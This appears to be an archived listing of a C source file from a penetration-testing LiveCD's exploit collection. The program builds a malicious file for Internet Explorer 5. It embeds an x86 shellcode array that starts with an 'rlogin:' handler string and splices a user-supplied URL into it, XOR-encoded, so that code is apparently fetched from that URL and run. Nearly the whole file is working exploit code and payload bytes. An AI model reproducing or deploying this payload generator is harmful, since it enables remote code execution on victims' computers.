home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webbrowser / IE / IE5telx.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  4.4 KB  |  125 lines
  1. #include <stdio.h>
  2. #include <afx.h>
  3. #include <windows.h>
  4.  
  5.  
  6. void Usage( void ) {
  7.   printf( "Usage: exfact url(40) outfile\n" );
  8. }
  9.  
  10. #define URL_OFFSET 48
  11.  
  12. unsigned char aSploit[] = {
  13.   0x72, 0x6C, 0x6F, 0x67, 0x69, 0x6E, 0x3A, 0x33,
  14.   0xDB, 0x3B, 0xDB, 0x74, 0x53, 0xAB, 0x88, 0xB2,
  15.   0x97, 0xB1, 0x94, 0xF0, 0x9E, 0xB2, 0x96, 0xDE,
  16.   0xAF, 0x8C, 0xB6, 0x9A, 0x95, 0xA9, 0x94, 0xB2,
  17.   0x95, 0xBF, 0x9E, 0x8A, 0x95, 0x9D, 0x9B, 0xBD,
  18.   0x92, 0xBB, 0xBC, 0xB7, 0x96, 0xBB, 0xBB, 0xDE,
  19.   0x9C, 0xAA, 0x8A, 0xE4, 0xC8, 0xEE, 0xC9, 0xF0,
  20.   0xC9, 0xEE, 0xD4, 0xEC, 0xCB, 0xEC, 0xD4, 0xEF,
  21.   0xCA, 0x82, 0x9B, 0xF0, 0x9F, 0xA6, 0x9F, 0xDE,
  22.   0x92, 0xec, 0xc0, 0x9b, 0xb2, 0x66, 0x33, 0x53,
  23.   0xb9, 0x61, 0x35, 0xee, 0xd2, 0xae, 0xd4, 0xDE,
  24.   0xAD, 0xB7, 0x94, 0x9B, 0x82, 0xBB, 0x99, 0xDE,
  25.   0xB3, 0x01, 0xC1, 0xC3, 0x18, 0x8B, 0xD3, 0x8B,
  26.   0xF3, 0x66, 0xBA, 0xC0, 0x10, 0x8B, 0x12, 0x66,
  27.   0xBB, 0xB8, 0x10, 0x8B, 0x1B, 0x66, 0xBE, 0xC0,
  28.   0xC2, 0x8B, 0x36, 0x8B, 0x7C, 0x24, 0x04, 0x33,
  29.   0xC9, 0xB1, 0x2F, 0x66, 0x8B, 0x07, 0x66, 0x35,
  30.   0xDE, 0xFA, 0x66, 0x89, 0x07, 0x83, 0xC7, 0x02,
  31.   0xE0, 0xF1, 0x8B, 0x4C, 0x24, 0x04, 0x83, 0xC1,
  32.   0x06, 0x51, 0xFF, 0xD2, 0x8B, 0x4C, 0x24, 0x04,
  33.   0x83, 0xC1, 0x11, 0x51, 0x50, 0xFF, 0xD3, 0x8B,
  34.   0xD3, 0x8B, 0xD8, 0x8B, 0x4C, 0x24, 0x04, 0x83,
  35.   0xC1, 0x51, 0x51, 0x56, 0xFF, 0xD2, 0x8B, 0xF8,
  36.   0x8B, 0xEC, 0x81, 0xC4, 0xFF, 0xFB, 0xFF, 0xFF,
  37.   0x8B, 0x4D, 0x04, 0x83, 0xC1, 0x29, 0x33, 0xC0,
  38.   0x50, 0x50, 0x66, 0xB8, 0xFF, 0x03, 0x50, 0x8B,
  39.   0xC5, 0x05, 0xFF, 0xFB, 0xFF, 0xFF, 0x50, 0x51,
  40.   0x33, 0xC0, 0x50, 0xFF, 0xD3, 0x8B, 0xDC, 0x33,
  41.   0xC0, 0x50, 0x53, 0xFF, 0xD7, 0x33, 0xC0, 0x74,
  42.   0xFE, 0x62, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
  43.   0x28, 0x01, 0xB9, 0x20, 0x61, 0x88, 0xFD, 0x56,
  44.   0x20, 0x0C, 0x02, 0xB9, 0x20, 0x01, 0x01, 0x01,
  45.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  46.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  47.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  48.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  49.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  50.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  51.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  52.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  53.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  54.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  55.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  56.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  57.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  58.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  59.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  60.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  61.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  62.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  63.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  64.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  65.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  66.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  67.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  68.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  69.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  70.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
  71.   0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0xFC, 0x56,
  72. };
  73.  
  74.  
  75. int main( int argc, char *argv[] ) {
  76.  
  77.   if( argc == 3 ) {
  78.     DWORD dwURLlen = strlen( argv[ 1 ] )+1;
  79.     if( dwURLlen < 40 ) {
  80.       HANDLE h = CreateFile(
  81.         argv[ 2 ],
  82.         GENERIC_WRITE,
  83.         0,
  84.         NULL,
  85.         CREATE_ALWAYS,
  86.         0,
  87.         0 );
  88.  
  89.       if ( h == INVALID_HANDLE_VALUE ) {
  90.         printf( "Error creating %s\n", argv[ 2 ] );
  91.         return( 0 );
  92.       }
  93.  
  94. DWORD dwWrit = 0;
  95.       if( !WriteFile( h, aSploit, URL_OFFSET, &dwWrit, NULL ) ||
  96.        ( dwWrit != URL_OFFSET ) )
  97.         goto writeerr;
  98.  
  99.       for( char *p = argv[ 1 ]; ( *p ) && ( *(p+1) ); p+=2 )
  100.         *PWORD( p ) ^= 0xdefa; // 0xfade "little-endian"ed - should use htons?
  101.       *PWORD( p ) ^= 0xdefa;
  102.  
  103.       if( !WriteFile( h, argv[ 1 ], dwURLlen, &dwWrit, NULL ) ||
  104.         ( dwWrit != dwURLlen ) )
  105.         goto writeerr;
  106.  
  107.       DWORD dwToWrite = sizeof( aSploit ) - ( URL_OFFSET + dwURLlen );
  108.       if( !WriteFile( h, &aSploit[ URL_OFFSET+dwURLlen ], dwToWrite,
  109.         &dwWrit, NULL ) || ( dwWrit != dwToWrite ) )
  110.         goto writeerr;
  111.  
  112.       CloseHandle( h );
  113.  
  114.       return( 0 );
  115.     }
  116.   }
  117.  
  118.   Usage();
  119.   return( 1 );
  120.  
  121. writeerr:
  122.   printf( "Error writing to %s\n", argv[ 2 ] );
  123.   return( 2 );
  124. }
  125.